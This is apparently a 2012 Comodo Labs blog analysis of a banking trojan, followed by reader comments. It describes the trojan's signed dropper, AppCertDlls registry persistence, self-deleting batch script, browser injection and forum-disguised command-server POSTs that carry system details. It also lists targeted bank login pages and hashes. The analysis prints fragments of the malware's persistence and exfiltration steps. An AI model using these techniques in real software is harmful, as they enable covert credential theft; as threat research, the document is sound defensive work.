Anatomy of a Trojan: TrojWare.Win32.TrojanSpy.Volisk.a

November 13, 2012 | By Igor

As part of Comodo Labs’ ongoing analysis of “Digital Signature” (confirming software author and guaranteeing computer program code hasn’t been altered or corrupted since being signed) ”malware” (software used or created to disrupt computer operation, gather sensitive information, or gain access to computer systems), we recently discovered a new sample which uses an interesting and potentially devastating combination of techniques to deliver its “payload” (cargo of a data transmission).

Starting with a digitally signed “dropper” (installation program), the malware was able to successfully inject itself into Windows “processes” (instances of computer programs being executed); bypass “firewall” (protects against threats from the public Internet) and “host intrusion protection mechanisms” (monitor a single computer for suspicious activity by analyzing events occurring within that computer); send user details to a control “server” (computer hardware dedicated to run one or more services); download additional “configuration files” (configure initial settings for some computer programs) and finally to direct its victims to “phishing” websites (designed to look like other websites in an attempt to steal users’ personal information) which request the user’s banking usernames/passwords. This document contains a detailed description of our observations.

The dropper (installer) component of the malware was digitally signed by a trusted Certificate Authority. Because the installer was ‘trusted’, it was then able to evade detection by the heuristic and Host Intrusion Protection Systems (HIPSs) of many popular Antivirus and Internet Security programs.

Digital Signature

Upon execution, the dropper first determines the architecture of the Windows operating system (32-bit or 64-bit) then extracts the appropriate main module from “PE” (Portable Executable) file resources.

DLL

The file name of this main module is generated by concatenating two named fragments from two random “*.exe” (Windows Executable) files in the Windows system folder. For example “diskpart.exe” (Windows text-mode command interpreter) and “eventvwr.exe” (Microsoft Event Viewer) generates the file name “disktvwr.dll”.

The main module is the PE “DLL” (Dynamic Link Library of functions and other information that can be accessed by a Windows program) which is placed in the Windows system folder under this generated name. It is then injected into the operating system process “explorer.exe” (Windows Explorer).

DLL
Dynamic Link Library

It is configured for automatic injection into most operating system processes and user applications via a randomly named value of an obscure Windows Registry key (similar to a folder):

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"ddeskeys"="C:\\Windows\\system32\\disktvwr.dll"

 

As a result, the function “CreateProcessNotify”, exported by the malware “module” (portion of the program that carries out a specific function and may be used alone or combined with other modules of the same program), is requested at the creation of each new process. This causes the malware DLL to be injected in most operating system processes and user applications.

After this operation, the dropper removes itself via the execution of a simple “DOS” (Disk Operating System) “BAT” (batch) script file:

Dynamic Link Library
1342562.bat:
attrib -s -r -h%1
:hkiflg
del %1
if exist %1 goto hkiflg
del %0

 

The main module is injected into the “explorer.exe” process and acts as a server application. It opens a “pipe” (named temporary software connection between two programs or commands) as a 128-bit Unique ID (UID), for example “\\\\.\\pipe\\{b2459e76-035d-2d18-0a97-debbcce1c0a5}”, and waits for incoming messages. Modules injected into other system processes and user applications act as “clients” (applications or systems that access a service made available by a server) and communicate with the server via the named pipe.

Hexa DLL

Modules injected into “iexplore.exe” (Microsoft Internet Explorer) and “firefox.exe” (Mozilla Firefox) web browser applications are used for communication with the remote control server. This tricks any firewall and HIPS technology by making network activity generated by the malware appear to have been initiated by the user. The current version of the malware does not support other browsers like “chrome.exe” (Google Chrome), “opera.exe” (Opera), and “safari.exe” (Apple Safari). To circumnavigate this issue, it prevents these browsers from opening and forces the user to use one of the supported browsers instead. The malware communicates with its remote control server by imitating access to a forum topic. Initially it sends an “HTTP” (Hypertext Transfer Protocol) “POST” (request method to request that the web server accepts the data enclosed in the request message’s body) for storage using a “URL” (Uniform Resource Locator global address of a web page on the World Wide Web) of following format:

http://*.*.*.*/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c

 

…with the request body containing basic information about the user’s system and the installed malware module:

“user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475&
win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin”

 

It will then receive an updated configuration file from the remote server. The malware stores the configuration and version information in a Windows Registry key named using a 128-bit UID in a similar way that has been used for the named pipe:

[HKEY_CURRENT_USER\Software\AppDataLow\{21414dba-01d1-50fc-8e2b-a28ff0952499}]
"k1"=dword:b12564d0
"k2"=dword:473d87bb
"Version"=dword:0000002a
"Data"=hex:ca,2b,09,00,1b,e1,80,02,41,4c,3a,45,42,43,61,5f,09,31,39,36,cd,2f,\
...

 

The primary purpose of this malware is to steal personal information such as bank information or credit card accounts. This is a list of URLs monitored by the malware according to a recent configuration file:

bankofamerica.com/accounts-overview/accounts-overview.go
bankofamerica.com/login/sign-in/signOnScreen.go
bankofamerica.com/login/sign-in/validatePassword.go
bankofamerica.com/myaccounts/
barclaycardus.com/app/ccsite/logon/loginUserDyn.jsp
billmelater.com/login/challenge.xhtml
billmelater.com/your-account/home.xhtml
bofa.com
chaseonline.chase.com/gw/secure/ena
chaseonline.chase.com/MyAccounts.aspx
chaseonline.chase.com/secure/Profile/UpdateContactInfo/UpdateContact.aspx
client.schwab.com/Accounts/
client.schwab.com/Accounts/Summary/Summary.aspx
client.schwab.com/Service/MyProfile/MailingAddress.aspx
consumercenter.gogecapital.com/consumercenter/homeaction.do
discovercard.com/cardmembersvcs/achome/homepage
mbwebexpress.blilk.com/Core/Authentication/MFAPassword.aspx
mfasa.chase.com/auth/auth-stoken-osl.html
online.americanexpress.com/myca/acctmgmt/
online.citibank.com
online.wellsfargo.com/das/cgi-bin/session.cgi
onlinebanking.pnc.com/
onlinebanking.tdbank.com/login.asp
paypal.com/us/cgi-bin/webscr?cmd=_account
paypal.com/us/cgi-bin/webscr?cmd=_login-done
safe.bankofamerica.com/myaccounts/accounts-overview/accounts-overview.go
safe.bankofamerica.com/myaccounts/brain/redirect.go
safe.bankofamerica.com/myaccounts/signin/signIn.go?isSecureMobil
servicing.capitalone.com/C1/Accounts/Summary.aspx
shop.aafes.com/shop/Login.aspx
shopmyexchange.com
sitekey.bankofamerica.com/sas/signon.do
sitekey.bankofamerica.com/sas/signonSetup.do
sitekey.bankofamerica.com/sas/verifyImage.do
ss2.experian.com/securecontrol/reset/ssphome
suntrust.com/portal/server.pt
us.etrade.com/e/t/accounts/accountsCombo
us.hsbc.com/1/2/!ut/
wwws.ameritrade.com/cgi-bin/apps/SecurityChallenge

 

Once a user accesses one of the monitored URLs, the malware generates a phishing page which asks the user to enter their account details (including user-name, password and credit card number) under the pretense of either recovering their account password or to enable additional security measures:

Security System

File information:

Dropper EXE:
Size: 285264
SHA-1: b9f07c2eec5277bfc91d4bb9b8bac4e8d4cc8632
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x86 DLL:
Size: 88576
SHA-1: ba7f13855e7ad9c32917188281c4420cef8a830e
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x64 DLL:
Size: 98304
SHA-1: 372c2eafd39b317e6a94e84d673d394b2afd4b3f
Signature: TrojWare.Win32.TrojanSpy.Volisk.a

 

Diagnosis, Removal & Protection Instructions

If your computer doesn’t have an Antivirus or Internet Security program installed and you believe it may have been infected by “malware” (malicious software):

1. Download Comodo Antivirus and perform a full scan with up-to-date antivirus database.
2. Remove Malware Found by choosing from recommended options and stay protected.

Be Sociable, Share!

    Comments

    Zen Network Technologies January 10, 2013 at 3:08 pm

    Viruses and trojan are become advanced. It’s has to be a pain for the anti virus compagnies such as Symantec and McAfee. The is happening to the internet security, DDoS attack are using advanced technique to find new exploits and hide themselves. Great in dept article. Keep them coming Igor.

    Reply
    kelly April 26, 2013 at 9:28 am

    I have gone through the comdo antivirus link..Its a complete package for security of our computer system.Are you offering any discount??

    Reply
    elms January 24, 2014 at 2:47 pm

    well, comodo is my best but ive noticed that it will not detect a virus (.exe) even when i know it is a virus. what makes it good are the other security features. otherwise, its like all anti viruses out there.

    Reply
      Kevin Judge January 29, 2014 at 8:53 pm

      You may be a little confused. If a file is not determined to be a virus, but not verified as safe it will run in a safe, secure area called the sandbox.
      If, as you say, it is a virus it cannot harm your system.

      Reply

    Add new comment

    Your name
    Comment

    You may use these HTML tags and attributes: <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>